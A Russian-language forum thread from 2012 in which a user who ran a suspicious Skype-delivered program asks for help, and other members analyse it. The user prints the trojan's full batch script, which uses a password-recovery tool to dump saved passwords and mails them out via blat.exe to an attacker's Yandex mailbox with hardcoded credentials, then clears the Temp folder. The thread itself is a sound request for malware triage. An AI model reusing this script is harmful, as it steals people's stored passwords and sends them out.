Что делает этот троян?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Что делает этот троян? - 2012-05-07 01:39:23.570000
|
|
|
Ainoshin
Сообщений: 3
Оценки: 0
Присоединился: 2012-05-07 01:23:43.080000
|
Здравствуйте, я совершенно не разбирающийся в программировании человек, решил испытать судьбу(да и по дурости, что уж и говорить), и в первый раз запустил подозрительную программу собственноручно, без виртуальной машины.
Ссылка на файл http://ifolder.ru/30336679
Вирустотал выдал вот что https://www.virustotal.com/file/269a638b853b65cb803b23f77ee6b17ebcf92a47677340f4a781225dc1d93bdc/analysis/1336337527/
Скачал Spybot, search and destroy, проверил систему Nod32 - ничего.
Все время смотрю на процессы.
Скачал PE Explorer, в resource editor увидел данный текст
quote:
@echo off
:start
ping ya.ru -n 5 >nul
if %errorlevel%==0 (goto send) else (goto end)
:end
goto :start
:send
blat.exe -install -server smtp.yandex.ru -port 587 -f trojan.gg@yandex.ru -u trojan.gg -pw 123321z
mpr.exe /export
ren *.mpf pass.mpf
blat.exe -body PassReg -to trojan.gg@yandex.ru -attach pass.mpf
del %Temp%\*.* /Q /S /F
Также:quote:
blat.exe*115200*block_reader.sys*1920*HookLib.dll*43008*MPR.exe*3392512*mpr.ini*258*blat.dll*122880*
Где-то было что-то наподобие 1.bat, больше ничего членораздельного не увидел. Кажется, это аттачмент он приложил?
Способ передачи файла - скайп, понятно, что невозможно определить откуда.
В момент запуска программы был открыт steam.exe и браузер Mozilla Firefox Aurora. Боюсь вырубить компьютер лишний раз.
Вот, собственно и вопросы: что сделала эта программа моему компу? Какие пароли он украл? Могу ли я сейчас поменять все пароли?
Что делать?
Собственно, помогите, пожалуйста.
|
|
|
|
|
RE: Что делает этот троян? - 2012-05-07 08:01:02.636666
|
|
|
zzsnn
Сообщений: 7459
Оценки: 680
Присоединился: 2007-09-25 07:17:14.240000
|
Что делает и что может сделать, сказать невозможно. Нужно дизассемблировать файлы blat.exe и mpr.exe.
Но судя по всему, трой просто тащит у тебя пароли.
Соединияется (проверяя соединение), потом тупо тащит все *.mpf, и шлёт на мыло trojan.gg@yandex.ru (пароль к ящику 123321z, там кстати ничего нет), и подчищает всё в папке Temp.
Данный трой должно быть несложно прибить. Он в автозагрузке виден должен быть. Судя по тексту троя создатель себя особо не заморачивал. Вряд ли что-то крутое есть.
Антивирусы на такое совсем и не должны реагировать. Всё в пределах разарешённого.
Тут должен срабатывать файрволл, зарезая любую попытку соедениться и передать данные. А его, судя по всему у тебя нет.
Как грохнуть трой? Давай лог AutoRuns ( http://technet.microsoft.com/ru-ru/sysinternals/bb963902 ), выложи на любой файлообменник, сюда ссылку. Посмотрим.
|
|
|
|
|
RE: Что делает этот троян? - 2012-05-07 09:27:11.800000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Такая поделка тащит пароли и обычно в автозапуск не записывается. blat.exe только отправляет письмо. mpr.exe - это multi password recovery, собирает пароли в файл pass.mpf. Батник все это хозяйство запускает, собственно он и представляет интерес, т.к. в нем записана почта и пароль кулхацкера.
|
|
|
|
|
RE: Что делает этот троян? - 2012-05-07 11:58:01.710000
|
|
|
Ainoshin
Сообщений: 3
Оценки: 0
Присоединился: 2012-05-07 01:23:43.080000
|
Логи Autoruns - http://ifolder.ru/30339730, Пароль - xaker
В logon был файл rdpclip, это он?
|
|
|
|
|
RE: Что делает этот троян? - 2012-05-07 12:11:19.210000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
UpdReg Creative UpdReg Creative Technology Ltd. c:\windows\updreg.exe
Bonjour Service Apple Inc. c:\program files\bonjour\mdnsresponder.exe
отключите
|
|
|
|
|
RE: Что делает этот троян? - 2012-05-08 01:01:52.380000
|
|
|
Ainoshin
Сообщений: 3
Оценки: 0
Присоединился: 2012-05-07 01:23:43.080000
|
В общем, путем многих исследований я выявил, что этот троян одноразовый.
Стырил ключ при запуске, отослал и все. Никаких отложенных задач.
Странных процессов не нашел, дотошно исследовал каждый.
Всем спасибо.
|
|
|
|
|
|
